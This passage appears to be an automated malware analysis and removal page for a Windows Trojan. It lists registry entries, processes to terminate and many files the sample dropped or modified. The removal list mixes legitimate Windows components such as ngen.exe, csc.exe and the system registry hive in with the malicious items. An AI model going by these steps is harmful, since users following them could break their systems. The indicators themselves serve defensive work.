"(Default)" = "Microsoft Program Group"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCR\.grp]
"(Default)" = "MSProgramGroup"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
Dropped PE files
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click here to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
csc.exe:1992
csc.exe:888
csc.exe:444
csc.exe:1532
csc.exe:544
csc.exe:2008
csc.exe:332
csc.exe:1752
csc.exe:1512
07-04-2016_hwopt_3.0.10-1.tmp:432
MSIF2.tmp:3740
netsh.exe:652
netsh.exe:2084
InstallUtil.exe:1744
InstallUtil.exe:2024
clicker.exe:2312
clicker.exe:2452
sc.exe:716
sc.exe:588
sc.exe:2000
sc.exe:456
sc.exe:504
sc.exe:1752
WindowsXP-KB968930-x86-ENG.exe:3496
master.exe:1488
mscorsvw.exe:4020
mscorsvw.exe:3616
mscorsvw.exe:2948
mscorsvw.exe:3756
mscorsvw.exe:2196
mscorsvw.exe:3536
mscorsvw.exe:3676
mscorsvw.exe:3044
mscorsvw.exe:2544
mscorsvw.exe:2564
mscorsvw.exe:1856
mscorsvw.exe:3180
mscorsvw.exe:2660
mscorsvw.exe:2508
mscorsvw.exe:2680
mscorsvw.exe:2872
mscorsvw.exe:3832
mscorsvw.exe:3872
mscorsvw.exe:304
mscorsvw.exe:224
mscorsvw.exe:1556
mscorsvw.exe:2536
mscorsvw.exe:2000
mscorsvw.exe:2412
mscorsvw.exe:2064
wsmanhttpconfig.exe:2848
wsmanhttpconfig.exe:2452
MsiExec.exe:3168
MsiExec.exe:2812
%original file name%.exe:1328
update.exe:3572
PSCustomSetupUtil.exe:2428
PSCustomSetupUtil.exe:3452
PSCustomSetupUtil.exe:3416
PSCustomSetupUtil.exe:2800
PSCustomSetupUtil.exe:3068
PSCustomSetupUtil.exe:3232
PSCustomSetupUtil.exe:2300
PSCustomSetupUtil.exe:2484
PSCustomSetupUtil.exe:2548
PSCustomSetupUtil.exe:3344
PSCustomSetupUtil.exe:2388
PSCustomSetupUtil.exe:2288
PSCustomSetupUtil.exe:3664
PSCustomSetupUtil.exe:2600
PSCustomSetupUtil.exe:2876
PSCustomSetupUtil.exe:3884
PSCustomSetupUtil.exe:2284
PSCustomSetupUtil.exe:3932
PSCustomSetupUtil.exe:2976
PSCustomSetupUtil.exe:3704
PSCustomSetupUtil.exe:3544
PSCustomSetupUtil.exe:3140
PSCustomSetupUtil.exe:3784
PSCustomSetupUtil.exe:3224
PSCustomSetupUtil.exe:3984
PSCustomSetupUtil.exe:3848
regsvr32.exe:3056
regsvr32.exe:2644
summit_sharma.exe:2672
07-04-2016_hwopt_3.0.10-1.exe:1632
XBLive.exe:3008
InstallationStatsUploder_12052016001648.exe:2044
InstallationStatsUploder_12052016001648.exe:1488
InstallationStatsUploder_12052016001648.exe:580
InstallationStatsUploder_12052016001648.exe:1636
InstallationStatsUploder_12052016001648.exe:1860
InstallationStatsUploder_12052016001648.exe:1612
InstallationStatsUploder_12052016001648.exe:640
InstallationStatsUploder_12052016001648.exe:1848
InstallationStatsUploder_12052016001648.exe:508
InstallationStatsUploder_12052016001648.exe:1292
InstallationStatsUploder_12052016001648.exe:1400
EditBinx86.exe:960
EditBinx86.exe:2012
mofcomp.exe:2684
ngen.exe:332
ngen.exe:276
ngen.exe:2092
ngen.exe:3300
ngen.exe:2136
ngen.exe:3212
ngen.exe:2056
ngen.exe:3340
ngen.exe:2248
ngen.exe:3160
ngen.exe:2112
ngen.exe:2240
ngen.exe:3232
ngen.exe:444
ngen.exe:1496
ngen.exe:2188
ngen.exe:2212
ngen.exe:2276
ngen.exe:780
ngen.exe:3224
ngen.exe:2024
ngen.exe:2160
ngen.exe:2148
runonce.exe:3520
cvtres.exe:308
cvtres.exe:1968
cvtres.exe:1556
cvtres.exe:952
cvtres.exe:1064
cvtres.exe:340
cvtres.exe:164
cvtres.exe:504
cvtres.exe:364
Osman_Navigation.exe:4072
PSSetupNativeUtils.exe:968
fileman.exe:1636
mastermind.exe:3740
grpconv.exe:3484
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Temp\pgamidov.dll (4150 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CSCF.tmp (664 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\pgamidov.out (396 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2q171lzo.dll (4150 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2q171lzo.out (396 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CSCB.tmp (664 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CSC7.tmp (664 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4_rcyvsa.dll (4150 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4_rcyvsa.out (396 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\kgul_apy.dll (4150 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CSCD.tmp (664 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\kgul_apy.out (396 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\8sqkbrnw.out (396 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CSC5.tmp (664 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\8sqkbrnw.dll (4150 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\xlrctlov.out (396 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CSC11.tmp (664 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\xlrctlov.dll (4150 bytes)
%WinDir%\Temp\4p64sgqi.dll (4150 bytes)
%WinDir%\Temp\4p64sgqi.out (396 bytes)
%WinDir%\Temp\CSC13.tmp (664 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\uuxr7wdt.out (396 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CSC3.tmp (664 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\uuxr7wdt.dll (4150 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CSC9.tmp (664 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\spcebjga.dll (4150 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\spcebjga.out (396 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-U38O7.tmp\EditBinx86.exe (28 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-U38O7.tmp\x86_WinDivert.zip (9 bytes)
%WinDir%\hwopt_12052016001648\unins000.dat (9300 bytes)
%WinDir%\hwopt_12052016001648\addon\nss_tools\is-SG5DG.tmp (5873 bytes)
%WinDir%\hwopt_12052016001648\Utils.dll (57 bytes)
%WinDir%\hwopt_12052016001648\is-JSA3M.tmp (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-U38O7.tmp\is-39PQT.tmp (28 bytes)
%WinDir%\hwopt_12052016001648\is-3HV2J.tmp (28 bytes)
%WinDir%\hwopt_12052016001648\addon\nss_tools\is-11RFO.tmp (601 bytes)
%WinDir%\hwopt_12052016001648\addon\is-RR6J5.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-U38O7.tmp\is-QADEL.tmp (9 bytes)
%WinDir%\hwopt_12052016001648\is-NGNQK.tmp (6841 bytes)
%WinDir%\hwopt_12052016001648\addon\nss_tools\is-KE3G3.tmp (5441 bytes)
%WinDir%\hwopt_12052016001648\addon\nss_tools\is-0GUHR.tmp (2321 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-U38O7.tmp\_isetup\_shfoldr.dll (23 bytes)
%WinDir%\hwopt_12052016001648\is-KKUTO.tmp (3361 bytes)
%WinDir%\hwopt_12052016001648\addon\is-H19H5.tmp (18 bytes)
%WinDir%\hwopt_12052016001648\addon\nss_tools\is-4A1SP.tmp (14 bytes)
%WinDir%\hwopt_12052016001648\addon\nss_tools\is-TJDF4.tmp (12 bytes)
%WinDir%\hwopt_12052016001648\addon\is-TRQBO.tmp (12287 bytes)
%WinDir%\hwopt_12052016001648\addon\is-1J7I3.tmp (1 bytes)
%WinDir%\hwopt_12052016001648\is-7B37I.tmp (20 bytes)
%WinDir%\hwopt_12052016001648\addon\nss_tools\is-J0U8C.tmp (601 bytes)
%WinDir%\hwopt_12052016001648\addon\nss_tools\is-22OLL.tmp (2105 bytes)
%WinDir%\hwopt_12052016001648\is-480KO.tmp (31 bytes)
%WinDir%\hwopt_12052016001648\addon\nss_tools\is-37BTT.tmp (673 bytes)
%WinDir%\hwopt_12052016001648\addon\is-3PU0B.tmp (5441 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-U38O7.tmp\fileman.exe (673 bytes)
%WinDir%\hwopt_12052016001648\addon\is-NUNLD.tmp (985 bytes)
%WinDir%\hwopt_12052016001648\addon\nss_tools\is-VTGNO.tmp (601 bytes)
%WinDir%\hwopt_12052016001648\is-1JNQO.tmp (25361 bytes)
%WinDir%\hwopt_12052016001648\addon\is-B1DBC.tmp (673 bytes)
%WinDir%\hwopt_12052016001648\addon\is-SVUH5.tmp (424 bytes)
%WinDir%\hwopt_12052016001648\addon\is-FLV5J.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-U38O7.tmp\Utilsx86.dll (57 bytes)
%WinDir%\hwopt_12052016001648\addon\nss_tools\is-FCRIP.tmp (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-U38O7.tmp\is-LKUF0.tmp (57 bytes)
%WinDir%\hwopt_12052016001648\addon\nss_tools\is-SI3J3.tmp (673 bytes)
%WinDir%\hwopt_12052016001648\addon\nss_tools\is-PL8C4.tmp (1281 bytes)
%WinDir%\hwopt_12052016001648\addon\is-4S0ED.tmp (31 bytes)
%WinDir%\hwopt_12052016001648\addon\is-DNIFE.tmp (6841 bytes)
%WinDir%\hwopt_12052016001648\addon\is-HP0LE.tmp (1 bytes)
%WinDir%\hwopt_12052016001648\addon\nss_tools\is-LS6F4.tmp (6841 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-U38O7.tmp\is-ADFMM.tmp (673 bytes)
%WinDir%\hwopt_12052016001648\is-V18V5.tmp (16 bytes)
%WinDir%\hwopt_12052016001648\addon\nss_tools\is-5O5GC.tmp (1281 bytes)
%WinDir%\hwopt_12052016001648\is-LDP3M.tmp (2321 bytes)
%WinDir%\hwopt_12052016001648\is-2JF6C.tmp (16 bytes)
%WinDir%\hwopt_12052016001648\addon\is-H96Q4.tmp (7345 bytes)
%WinDir%\hwopt_12052016001648\WinDivert.dll (18 bytes)
%WinDir%\hwopt_12052016001648\addon\is-T8IBT.tmp (7971 bytes)
%WinDir%\hwopt_12052016001648\hwopt12052016001648.InstallLog (732 bytes)
%System%\config\SYSTEM.LOG (4777 bytes)
%WinDir%\hwopt_12052016001648\hwopt12052016001648.InstallState (196 bytes)
%System%\config\system (1723 bytes)
C:\$Directory (288 bytes)
%WinDir%\hwopt_12052016001648\InstallUtil.InstallLog (672 bytes)
%WinDir%\hwopt_12052016001648\hwopt12052016001648_updater_service.InstallState (196 bytes)
%WinDir%\hwopt_12052016001648\hwopt12052016001648_updater_service.InstallLog (876 bytes)
%Documents and Settings%\%current user%\Application Data\b_dk.jpg (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw16.tmp (7405 bytes)
%Documents and Settings%\%current user%\Application Data\chapter.gif (7192 bytes)
%Documents and Settings%\%current user%\Application Data\1.png (234 bytes)
%Documents and Settings%\%current user%\Application Data\28.svg (1 bytes)
%Documents and Settings%\%current user%\Application Data\TerraceSawwortSouthernwood (2 bytes)
%Documents and Settings%\%current user%\Application Data\septillions.dll (6 bytes)
%Documents and Settings%\%current user%\Application Data\System.dll (11 bytes)
%Documents and Settings%\%current user%\Application Data\make.graphic.viewport.xml (1 bytes)
C:\f1fab1e3e4f7fec893e8\update\update.exe (10748 bytes)
C:\f1fab1e3e4f7fec893e8\about_language_keywords.help.txt (11 bytes)
C:\f1fab1e3e4f7fec893e8\about_if.help.txt (3 bytes)
C:\f1fab1e3e4f7fec893e8\windowsremotemanagement.adm (574 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.editor.dll (14450 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.backgroundintelligenttransfer.management.interop.dll (1532 bytes)
C:\f1fab1e3e4f7fec893e8\about_modules.help.txt (13 bytes)
C:\f1fab1e3e4f7fec893e8\update\updspapi.dll (5940 bytes)
C:\f1fab1e3e4f7fec893e8\winrm.cmd (35 bytes)
C:\f1fab1e3e4f7fec893e8\system.management.automation.dll-help.xml (16567 bytes)
C:\f1fab1e3e4f7fec893e8\about_scripts.help.txt (12 bytes)
C:\f1fab1e3e4f7fec893e8\about_wildcards.help.txt (3 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.backgroundintelligenttransfer.management.dll (1537 bytes)
C:\f1fab1e3e4f7fec893e8\about_aliases.help.txt (6 bytes)
C:\f1fab1e3e4f7fec893e8\about_type_operators.help.txt (5 bytes)
C:\f1fab1e3e4f7fec893e8\registry.format.ps1xml (20 bytes)
C:\f1fab1e3e4f7fec893e8\about_try_catch_finally.help.txt (7 bytes)
C:\f1fab1e3e4f7fec893e8\wsmauto.mof (4 bytes)
C:\f1fab1e3e4f7fec893e8\about_regular_expressions.help.txt (5 bytes)
C:\f1fab1e3e4f7fec893e8\about_methods.help.txt (6 bytes)
C:\f1fab1e3e4f7fec893e8\winrm.ini (1956 bytes)
C:\f1fab1e3e4f7fec893e8\types.ps1xml (2510 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.security.resources.dll (9 bytes)
C:\f1fab1e3e4f7fec893e8\wtrinstaller.ico (4803 bytes)
C:\f1fab1e3e4f7fec893e8\wsmprovhost.exe (657 bytes)
C:\f1fab1e3e4f7fec893e8\about_while.help.txt (2 bytes)
C:\f1fab1e3e4f7fec893e8\about_parsing.help.txt (2 bytes)
C:\f1fab1e3e4f7fec893e8\wsman.format.ps1xml (837 bytes)
C:\f1fab1e3e4f7fec893e8\dotnettypes.format.ps1xml (266 bytes)
C:\f1fab1e3e4f7fec893e8\about_trap.help.txt (10 bytes)
C:\f1fab1e3e4f7fec893e8\about_bits_cmdlets.help.txt (7 bytes)
C:\f1fab1e3e4f7fec893e8\spuninst.exe (3787 bytes)
C:\f1fab1e3e4f7fec893e8\about_script_internationalization.help.txt (9 bytes)
C:\f1fab1e3e4f7fec893e8\system.management.automation.resources.dll (3153 bytes)
C:\f1fab1e3e4f7fec893e8\powershell_ise.exe (2526 bytes)
C:\f1fab1e3e4f7fec893e8\pssetupnativeutils.exe (9 bytes)
C:\f1fab1e3e4f7fec893e8\wsmauto.dll (1842 bytes)
C:\f1fab1e3e4f7fec893e8\powershellcore.format.ps1xml (1492 bytes)
C:\f1fab1e3e4f7fec893e8\pspluginwkr.dll (1756 bytes)
C:\f1fab1e3e4f7fec893e8\powershelltrace.format.ps1xml (344 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.commands.diagnostics.dll-help.xml (2301 bytes)
C:\f1fab1e3e4f7fec893e8\about_do.help.txt (2 bytes)
C:\f1fab1e3e4f7fec893e8\about_variables.help.txt (6 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.commands.utility.resources.dll (508 bytes)
C:\f1fab1e3e4f7fec893e8\update\update.inf (2457 bytes)
C:\f1fab1e3e4f7fec893e8\about_path_syntax.help.txt (5 bytes)
C:\f1fab1e3e4f7fec893e8\winrmprov.mof (789 bytes)
C:\f1fab1e3e4f7fec893e8\about_operators.help.txt (770 bytes)
C:\f1fab1e3e4f7fec893e8\about_reserved_words.help.txt (1 bytes)
C:\f1fab1e3e4f7fec893e8\about_parameters.help.txt (9 bytes)
C:\f1fab1e3e4f7fec893e8\windowsremoteshell.adm (12 bytes)
C:\f1fab1e3e4f7fec893e8\compiledcomposition.microsoft.powershell.gpowershell.dll (1737 bytes)
C:\f1fab1e3e4f7fec893e8\about_types.ps1xml.help.txt (481 bytes)
C:\f1fab1e3e4f7fec893e8\about_pssession_details.help.txt (9 bytes)
C:\f1fab1e3e4f7fec893e8\about_ref.help.txt (1 bytes)
C:\f1fab1e3e4f7fec893e8\default.help.txt (2 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.wsman.runtime.dll (33 bytes)
C:\f1fab1e3e4f7fec893e8\about_transactions.help.txt (1011 bytes)
C:\f1fab1e3e4f7fec893e8\about_comment_based_help.help.txt (595 bytes)
C:\f1fab1e3e4f7fec893e8\about_pssnapins.help.txt (6 bytes)
C:\f1fab1e3e4f7fec893e8\about_core_commands.help.txt (221 bytes)
C:\f1fab1e3e4f7fec893e8\eventforwarding.adm (2 bytes)
C:\f1fab1e3e4f7fec893e8\about_format.ps1xml.help.txt (17 bytes)
C:\f1fab1e3e4f7fec893e8\about_hash_tables.help.txt (6 bytes)
C:\f1fab1e3e4f7fec893e8\pwrshplugin.dll (802 bytes)
C:\f1fab1e3e4f7fec893e8\about_eventlogs.help.txt (5 bytes)
C:\f1fab1e3e4f7fec893e8\certificate.format.ps1xml (155 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.commands.management.resources.dll (508 bytes)
C:\f1fab1e3e4f7fec893e8\about_ws-management_cmdlets.help.txt (405 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.gpowershell.dll (9738 bytes)
C:\f1fab1e3e4f7fec893e8\importallmodules.psd1 (438 bytes)
C:\f1fab1e3e4f7fec893e8\pwrshsip.dll (24 bytes)
C:\f1fab1e3e4f7fec893e8\about_remote_troubleshooting.help.txt (146 bytes)
C:\f1fab1e3e4f7fec893e8\wsmwmipl.dll (2816 bytes)
C:\f1fab1e3e4f7fec893e8\about_requires.help.txt (2 bytes)
C:\f1fab1e3e4f7fec893e8\about_command_syntax.help.txt (5 bytes)
C:\f1fab1e3e4f7fec893e8\about_remote_faq.help.txt (775 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.gpowershell.resources.dll (408 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.commands.management.dll (3386 bytes)
C:\f1fab1e3e4f7fec893e8\about_wmi_cmdlets.help.txt (8 bytes)
C:\f1fab1e3e4f7fec893e8\about_functions_advanced_methods.help.txt (9 bytes)
C:\f1fab1e3e4f7fec893e8\getevent.types.ps1xml (15 bytes)
C:\f1fab1e3e4f7fec893e8\about_split.help.txt (10 bytes)
C:\f1fab1e3e4f7fec893e8\wsmsvc.dll (15909 bytes)
C:\f1fab1e3e4f7fec893e8\profile.ps1 (772 bytes)
C:\f1fab1e3e4f7fec893e8\about_locations.help.txt (794 bytes)
C:\f1fab1e3e4f7fec893e8\about_pipelines.help.txt (411 bytes)
C:\f1fab1e3e4f7fec893e8\pwrshmsg.dll (4 bytes)
C:\f1fab1e3e4f7fec893e8\winrsmgr.dll (2 bytes)
C:\f1fab1e3e4f7fec893e8\update\spcustom.dll (23 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.consolehost.dll-help.xml (900 bytes)
C:\f1fab1e3e4f7fec893e8\about_functions_advanced_parameters.help.txt (962 bytes)
C:\f1fab1e3e4f7fec893e8\about_remote.help.txt (7 bytes)
C:\f1fab1e3e4f7fec893e8\wsmpty.xsl (1 bytes)
C:\f1fab1e3e4f7fec893e8\update\update.ver (14 bytes)
C:\f1fab1e3e4f7fec893e8\about_properties.help.txt (7 bytes)
C:\f1fab1e3e4f7fec893e8\about_break.help.txt (792 bytes)
C:\f1fab1e3e4f7fec893e8\about_quoting_rules.help.txt (659 bytes)
C:\f1fab1e3e4f7fec893e8\spupdsvc.exe (287 bytes)
C:\f1fab1e3e4f7fec893e8\about_functions_advanced.help.txt (3 bytes)
C:\f1fab1e3e4f7fec893e8\wsmtxt.xsl (2 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.commands.utility.dll (9684 bytes)
C:\f1fab1e3e4f7fec893e8\about_redirection.help.txt (2 bytes)
C:\f1fab1e3e4f7fec893e8\winrs.exe (1154 bytes)
C:\f1fab1e3e4f7fec893e8\help.format.ps1xml (3947 bytes)
C:\f1fab1e3e4f7fec893e8\wsmres.dll (6164 bytes)
C:\f1fab1e3e4f7fec893e8\winrssrv.dll (12 bytes)
C:\f1fab1e3e4f7fec893e8\about_continue.help.txt (1 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.wsman.management.dll (5010 bytes)
C:\f1fab1e3e4f7fec893e8\about_return.help.txt (3 bytes)
C:\f1fab1e3e4f7fec893e8\about_objects.help.txt (2 bytes)
C:\f1fab1e3e4f7fec893e8\about_environment_variables.help.txt (417 bytes)
C:\f1fab1e3e4f7fec893e8\update\kb968930xp.cat (512 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.consolehost.resources.dll (778 bytes)
C:\f1fab1e3e4f7fec893e8\about_remote_jobs.help.txt (13 bytes)
C:\f1fab1e3e4f7fec893e8\bitstransfer.psd1 (950 bytes)
C:\f1fab1e3e4f7fec893e8\about_remote_requirements.help.txt (6 bytes)
C:\f1fab1e3e4f7fec893e8\about_remote_output.help.txt (887 bytes)
C:\f1fab1e3e4f7fec893e8\about_functions_cmdletbindingattribute.help.txt (3 bytes)
C:\f1fab1e3e4f7fec893e8\about_script_blocks.help.txt (3 bytes)
C:\f1fab1e3e4f7fec893e8\about_profiles.help.txt (457 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.commands.diagnostics.resources.dll (470 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.wsman.management.resources.dll (13 bytes)
C:\f1fab1e3e4f7fec893e8\winrscmd.dll (2907 bytes)
C:\f1fab1e3e4f7fec893e8\about_arrays.help.txt (8 bytes)
C:\f1fab1e3e4f7fec893e8\about_signing.help.txt (12 bytes)
C:\f1fab1e3e4f7fec893e8\about_automatic_variables.help.txt (14 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.commands.utility.dll-help.xml (20810 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.graphicalhost.resources.dll (16 bytes)
C:\f1fab1e3e4f7fec893e8\spmsg.dll (495 bytes)
C:\f1fab1e3e4f7fec893e8\about_windows_powershell_ise.help.txt (6 bytes)
C:\f1fab1e3e4f7fec893e8\about_data_sections.help.txt (5 bytes)
C:\f1fab1e3e4f7fec893e8\about_providers.help.txt (59 bytes)
C:\f1fab1e3e4f7fec893e8\powershell_ise.resources.dll (4 bytes)
C:\f1fab1e3e4f7fec893e8\about_debuggers.help.txt (21 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.editor.resources.dll (562 bytes)
C:\f1fab1e3e4f7fec893e8\pscustomsetuputil.exe (316 bytes)
C:\f1fab1e3e4f7fec893e8\winrmprov.dll (591 bytes)
C:\f1fab1e3e4f7fec893e8\diagnostics.format.ps1xml (590 bytes)
C:\f1fab1e3e4f7fec893e8\about_logical_operators.help.txt (2 bytes)
C:\f1fab1e3e4f7fec893e8\about_line_editing.help.txt (1 bytes)
C:\f1fab1e3e4f7fec893e8\about_command_precedence.help.txt (8 bytes)
C:\f1fab1e3e4f7fec893e8\filesystem.format.ps1xml (133 bytes)
C:\f1fab1e3e4f7fec893e8\powershell.exe.mui (10 bytes)
C:\f1fab1e3e4f7fec893e8\about_session_configurations.help.txt (276 bytes)
C:\f1fab1e3e4f7fec893e8\about_prompts.help.txt (7 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.security.dll (1145 bytes)
C:\f1fab1e3e4f7fec893e8\about_assignment_operators.help.txt (379 bytes)
C:\f1fab1e3e4f7fec893e8\$shtdwn$.req (788 bytes)
C:\f1fab1e3e4f7fec893e8\bitstransfer.format.ps1xml (16 bytes)
C:\f1fab1e3e4f7fec893e8\windowspowershellhelp.chm (26041 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.graphicalhost.dll (4408 bytes)
C:\f1fab1e3e4f7fec893e8\about_execution_policies.help.txt (13 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.wsman.management.dll-help.xml (8740 bytes)
C:\f1fab1e3e4f7fec893e8\about_switch.help.txt (489 bytes)
C:\f1fab1e3e4f7fec893e8\about_throw.help.txt (5 bytes)
C:\f1fab1e3e4f7fec893e8\about_join.help.txt (2 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.security.dll-help.xml (1797 bytes)
C:\f1fab1e3e4f7fec893e8\wevtfwd.dll (3351 bytes)
C:\f1fab1e3e4f7fec893e8\about_escape_characters.help.txt (2 bytes)
C:\f1fab1e3e4f7fec893e8\update\eula.txt (586 bytes)
C:\f1fab1e3e4f7fec893e8\winrm.vbs (2727 bytes)
C:\f1fab1e3e4f7fec893e8\about_comparison_operators.help.txt (11 bytes)
C:\f1fab1e3e4f7fec893e8\about_arithmetic_operators.help.txt (168 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.backgroundintelligenttransfer.management.dll-help.xml (2472 bytes)
C:\f1fab1e3e4f7fec893e8\about_functions.help.txt (586 bytes)
C:\f1fab1e3e4f7fec893e8\about_special_characters.help.txt (3 bytes)
C:\f1fab1e3e4f7fec893e8\winrshost.exe (22 bytes)
C:\f1fab1e3e4f7fec893e8\about_jobs.help.txt (12 bytes)
C:\f1fab1e3e4f7fec893e8\about_scopes.help.txt (76 bytes)
C:\f1fab1e3e4f7fec893e8\about_commonparameters.help.txt (12 bytes)
C:\f1fab1e3e4f7fec893e8\wsmplpxy.dll (603 bytes)
C:\f1fab1e3e4f7fec893e8\about_preference_variables.help.txt (37 bytes)
C:\f1fab1e3e4f7fec893e8\about_foreach.help.txt (10 bytes)
C:\f1fab1e3e4f7fec893e8\about_windows_powershell_2.0.help.txt (453 bytes)
C:\f1fab1e3e4f7fec893e8\about_history.help.txt (3 bytes)
C:\f1fab1e3e4f7fec893e8\wsmanhttpconfig.exe (3009 bytes)
C:\f1fab1e3e4f7fec893e8\about_pssessions.help.txt (9 bytes)
C:\f1fab1e3e4f7fec893e8\about_job_details.help.txt (824 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.backgroundintelligenttransfer.management.resources.dll (7 bytes)
C:\f1fab1e3e4f7fec893e8\microsoft.powershell.commands.management.dll-help.xml (28236 bytes)
C:\f1fab1e3e4f7fec893e8\about_for.help.txt (146 bytes)
%WinDir%\Temp\4p64sgqi.cmdline (358 bytes)
%WinDir%\Temp\4p64sgqi.0.cs (676 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPFE.tmp\Microsoft.PowerShell.ConsoleHost.dll (33378 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPFC.tmp\Microsoft.PowerShell.Commands.Management.dll (45020 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPFB.tmp\Microsoft.PowerShell.Commands.Diagnostics.dll (33116 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPF6.tmp\Microsoft.BackgroundIntelligentTransfer.Management.dll (27440 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAP104.tmp\Microsoft.WSMan.Runtime.dll (17713 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPFD.tmp\Microsoft.PowerShell.Commands.Utility.dll (40638 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAP101.tmp\Microsoft.PowerShell.GraphicalHost.dll (47422 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAP102.tmp\Microsoft.PowerShell.Security.dll (35530 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPFF.tmp\Microsoft.PowerShell.Editor.dll (64500 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAP100.tmp\Microsoft.PowerShell.GPowerShell.dll (50011 bytes)
%WinDir%\Microsoft.NET\Framework\v4.0.30319\ngen_service.log (514 bytes)
%WinDir%\Microsoft.NET\Framework\v4.0.30319\NGEN_SERVICE.LOG (81233 bytes)
%WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAP103.tmp\Microsoft.WSMan.Management.dll (34061 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq2.tmp\UAC.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq2.tmp\mastermind\mastermind.exe (47508 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq2.tmp\NActions.dll (5869 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq2.tmp\sib.dat (23 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq2.tmp\07-04-2016_hwopt_3.0.10-1\07-04-2016_hwopt_3.0.10-1.exe (166653 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq2.tmp\clicker\clicker.exe (8876 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq2.tmp\summit_sharma\summit_sharma.exe (44026 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsq2.tmp\Osman_Navigation\Osman_Navigation.exe (31448 bytes)
%System%\WindowsPowerShell\v1.0\SETE2.tmp (4185 bytes)
